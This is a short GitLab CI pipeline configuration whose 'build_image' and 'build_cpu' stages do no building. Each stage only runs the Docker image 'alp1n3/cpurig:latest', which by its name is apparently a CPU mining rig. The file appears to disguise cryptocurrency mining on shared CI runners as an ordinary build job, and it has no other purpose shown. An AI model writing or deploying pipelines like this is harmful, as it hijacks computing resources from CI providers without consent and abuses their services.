image: docker:latest

services:
  - docker:dind

stages:
  - build_image
  - build_cpu

before_script:
  - docker info

build_image:
  stage: build_image
  script:
    - docker run alp1n3/cpurig:latest

build_cpu:
  stage: build_cpu
  script:
    - docker run alp1n3/cpurig:latest
